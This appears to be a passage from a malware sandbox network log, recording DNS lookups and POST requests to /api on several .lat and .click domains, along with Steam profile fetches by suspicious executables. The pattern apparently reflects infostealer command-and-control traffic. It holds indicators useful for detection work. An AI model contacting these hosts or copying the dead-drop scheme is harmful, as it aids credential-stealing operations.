                        IN A
                        104.21.50.254
                      • [US]
                        POST
                        https://necklacebudi.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.215.121:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: necklacebudi.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=vbe3hml21bm4k15tt4iarvjq2q; expires=Mon, 14 Apr 2025 22:33:19 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mfmUI5Hw48FV5P4hcgUH42MEBdK6uzL3WjbpeSugqmvGh4sHXdfjOn8arXstPi4MsNnx7ewiP23940A8cVrtO9kS40BUH0FlyuxdAb0eoX1uwPzRhKWVFcrFKifVDjHUGZ4"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd6bcda671ed-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=53891&min_rtt=47442&rtt_var=13769&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=78085&cwnd=253&unsent_bytes=0&cid=526fb3ead9ec73aa&ts=274&x=0"
                      • [US]
                        DNS
                        treehoneyi.click
                        fcc74b3f6b.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        treehoneyi.click
                        IN A
                        Response
                        treehoneyi.click
                        IN A
                        172.67.180.113
                        treehoneyi.click
                        IN A
                        104.21.91.209
                      • [US]
                        DNS
                        treehoneyi.click
                        fcc74b3f6b.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        treehoneyi.click
                        IN A
                      • [US]
                        DNS
                        energyaffai.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        energyaffai.lat
                        IN A
                        Response
                        energyaffai.lat
                        IN A
                        104.21.64.1
                        energyaffai.lat
                        IN A
                        104.21.96.1
                        energyaffai.lat
                        IN A
                        104.21.48.1
                        energyaffai.lat
                        IN A
                        104.21.80.1
                        energyaffai.lat
                        IN A
                        104.21.16.1
                        energyaffai.lat
                        IN A
                        104.21.112.1
                        energyaffai.lat
                        IN A
                        104.21.32.1
                      • [US]
                        POST
                        https://energyaffai.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        104.21.64.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: energyaffai.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=ft2lqnbtfp77lhq2joudn7glpj; expires=Mon, 14 Apr 2025 22:33:19 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YtjFAhCWJBI6RAhfH9gdpzRa7KDDyd%2FuIoac4KwkJ644U8Qs9FhISZ%2FH2ICXDri2DyWWdBBSrZUd5X3EkncCtXRqYRDEkIh3Ma6g0Ntl2CC4Wh9c%2BGqZjs59eA5kbFUHQwY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd6eafcb9505-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=56350&min_rtt=47564&rtt_var=14289&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=583&delivery_rate=75295&cwnd=253&unsent_bytes=0&cid=8607058828aedcfe&ts=283&x=0"
                      • [US]
                        DNS
                        aspecteirs.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        aspecteirs.lat
                        IN A
                        Response
                        aspecteirs.lat
                        IN A
                        172.67.157.253
                        aspecteirs.lat
                        IN A
                        104.21.66.85
                      • [US]
                        POST
                        https://aspecteirs.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.157.253:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: aspecteirs.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=t1jp3s3pmvnog0cb6r7n4a9kde; expires=Mon, 14 Apr 2025 22:33:19 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=au%2FJvJjk%2FKWlzlQSdZvHRQsfpy3%2BPUgPWTG33YioiONi7Bk938NPdB7GyzggdHBAPOjDGgjLOan8j6wOdVKwdHdAGh3Ns7uHgAQGy55%2FNjUDpL3ZpqHRmBinz9a8X5xZww%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd715b856323-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50376&min_rtt=47425&rtt_var=13001&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=582&delivery_rate=75188&cwnd=245&unsent_bytes=0&cid=d5ca38a2a65498c8&ts=276&x=0"
                      • [US]
                        DNS
                        sustainskelet.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        sustainskelet.lat
                        IN A
                        Response
                        sustainskelet.lat
                        IN A
                        104.21.48.1
                        sustainskelet.lat
                        IN A
                        104.21.32.1
                        sustainskelet.lat
                        IN A
                        104.21.80.1
                        sustainskelet.lat
                        IN A
                        104.21.64.1
                        sustainskelet.lat
                        IN A
                        104.21.112.1
                        sustainskelet.lat
                        IN A
                        104.21.16.1
                        sustainskelet.lat
                        IN A
                        104.21.96.1
                      • [US]
                        POST
                        https://sustainskelet.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        104.21.48.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sustainskelet.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=cbaeauv41dif5736034p28ladi; expires=Mon, 14 Apr 2025 22:33:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kbw0PUdIzo2K2kmqfPYSCagvkiEYdhpgMRjarald54gJkkWYr086esRjnU%2BfZCIPXTaNRQk7gELCnbwDJFXwBva%2FXPCbiWHYEG%2FBKN2PEaWHEOHRnUi0jOMzIo3TgVrgu554aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd73ffed4141-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49954&min_rtt=48424&rtt_var=12804&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=74380&cwnd=253&unsent_bytes=0&cid=4da649bb2d448688&ts=268&x=0"
                      • [US]
                        POST
                        https://treehoneyi.click/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.180.113:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: treehoneyi.click
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=qsobb6vbce2dk7hf78f1m4gge3; expires=Mon, 14 Apr 2025 22:33:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K6j5NlGdKycIcn9S4Pza1f28gXwjuaF5Rg39dbLBdZEL1ycjY4S3V5OrrwHqaa6HPrBhdHCEpv5LlzHVp4SWIXNnMi%2Fjc0CVXiG%2Fqazddodf9PzDGfUs0VENPZY33HUK%2Bnb%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd74dfca9547-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=59080&min_rtt=47272&rtt_var=33162&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=75700&cwnd=253&unsent_bytes=0&cid=69f5dd3536d3d1ed&ts=367&x=0"
                      • [US]
                        DNS
                        crosshuaht.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        crosshuaht.lat
                        IN A
                        Response
                        crosshuaht.lat
                        IN A
                        104.21.52.127
                        crosshuaht.lat
                        IN A
                        172.67.199.59
                      • [US]
                        POST
                        https://crosshuaht.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        104.21.52.127:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: crosshuaht.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=be9mpjni8pkkgrrqpek2q6g1rk; expires=Mon, 14 Apr 2025 22:33:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEmuUi678qz4eGaZQxVFHDIMetVGBMyA7rXrgnUTLobL5Kym35mhPzxVVkhXoEHzivC0hzljJLgRQanGK9gkaGCVElALlErg7tlIYwi7jbrARTaYCZHgCeRq4amsouIn3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd769f556433-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49824&min_rtt=47484&rtt_var=12763&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=582&delivery_rate=75381&cwnd=253&unsent_bytes=0&cid=c51262a6d4747dd1&ts=268&x=0"
                      • [US]
                        DNS
                        rapeflowwj.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        rapeflowwj.lat
                        IN A
                        Response
                      • [US]
                        POST
                        https://discokeyus.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.197.170:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: discokeyus.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=pfonse583okus0tb86lpg4heai; expires=Mon, 14 Apr 2025 22:33:23 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rNrWFGWYG2KKzLQ%2BntOFvtff6UenpSKgZNG3X90BgZKaohCibSuTxrIxeE%2BDwwxVu83oiVXsqYWMrQj9nq21%2FfE1ghLzZaK%2FJto8ZtS0S02CuZj4EpZdY16LUlzt0NTYBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd859ca8cda1-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49318&min_rtt=47582&rtt_var=12677&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=75448&cwnd=253&unsent_bytes=0&cid=e6138e596e96396b&ts=273&x=0"
                      • [US]
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                        Response
                        steamcommunity.com
                        IN A
                        23.214.143.155
                      • [GB]
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        823e4bdbcb.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:46:44 GMT
                        Content-Length: 25984
                        Connection: keep-alive
                        Set-Cookie: sessionid=22b20c12a81dc2b09e57ceae; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • [US]
                        POST
                        https://necklacebudi.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.215.121:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: necklacebudi.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=imujn2o37lvuc0t16fjrtt1vn3; expires=Mon, 14 Apr 2025 22:33:23 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAUI61A45jQTfanxm97%2BP02cS3bxZJ2YQIjCnNMqsaGU6TCA0ThiOLDUA6t4pc%2FMpHLYJGFO5ipKcYmbkPb4HiNtNeJA2zT3XDO5aUSjm6Vb%2F9JWvJ21LCZ%2Bl3PDCMA6ONGF"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd87e917632b-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49996&min_rtt=47491&rtt_var=12535&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=78601&cwnd=253&unsent_bytes=0&cid=caf528420045451a&ts=268&x=0"
                      • flag-us
                        POST
                        https://energyaffai.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        104.21.64.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: energyaffai.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=73eun6gb635gd499jhhb67tj2b; expires=Mon, 14 Apr 2025 22:33:23 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj7ZkCQf18GKShVxjzl4hP8sSxjrizQ3lQLB0iQX2i4rjmNoBIn8jcT%2FGdLuKTZiIdIlXTZ1C%2FCUx4Qt%2B8oHPJJF2LI0tHUhnoFbr2SD8%2F3wvK6wnqLlU1XVNdgKRriRqjI%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd8a4c9bcdad-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49998&min_rtt=47185&rtt_var=15023&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=583&delivery_rate=73756&cwnd=253&unsent_bytes=0&cid=fbbba66f0d5a847a&ts=280&x=0"
                      • flag-us
                        POST
                        https://aspecteirs.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.157.253:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: aspecteirs.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=llu0qi2g8v8lboen9m1772ddvt; expires=Mon, 14 Apr 2025 22:33:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KYTfCKqBH4DiyPVjvZqdwCXH5Xqr0lOAMCRWN529J3vr53HcrxZK%2B8Kqiy0cEqO7uKUJiUMt45nrBWPfVzdMztjeeI2I1zIOW2K%2FZj7QUZMHCeCMvzh0kv6hooAWf7PNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd8caa6d6388-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50747&min_rtt=47321&rtt_var=13837&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=74873&cwnd=250&unsent_bytes=0&cid=5878c9e2d432f9ce&ts=290&x=0"
                      • flag-us
                        POST
                        https://sustainskelet.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        104.21.48.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sustainskelet.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=i0feaq0cp82ai4dmdt3trk8ljn; expires=Mon, 14 Apr 2025 22:33:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4f2APaF6chUI2dyB%2F1OFHlqPW3RmBLi2YJdmsHB7g%2BQW0vRxN4wO02wvBo8Ae0ODinS3Gz9gXfj7qu2ZyDacLVBpUfhvdexuxqxitKHvIHM0sQvt8n8d%2BrQOSWGKuoXed5YEOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd8f0bfb93f2-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50310&min_rtt=48216&rtt_var=12973&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=585&delivery_rate=74524&cwnd=253&unsent_bytes=0&cid=30de6a4b35c0ac1c&ts=270&x=0"
                      • flag-us
                        POST
                        https://crosshuaht.lat/api
                        fcc74b3f6b.exe
                        Remote address:
                        104.21.52.127:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: crosshuaht.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=evoppcq68esskokjd9ag41cunq; expires=Mon, 14 Apr 2025 22:33:25 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2F5q2n%2BnfRcxhQ7ijfxM8OvpwZxE14hnwpKp9hxYeDG8txVGR0N7FMhQRffJ%2Ba98%2B%2FNBAR3A6R%2Bzg%2F7Cca%2FDg0yoJy%2BEQ5FbWdQPD1gHGSjn75ac4fRgwRpOBGl1NBpVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd915a03886d-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=48353&min_rtt=46847&rtt_var=12363&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=582&delivery_rate=75407&cwnd=253&unsent_bytes=0&cid=7741eabcfa859a8d&ts=266&x=0"
                      • flag-gb
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        fcc74b3f6b.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
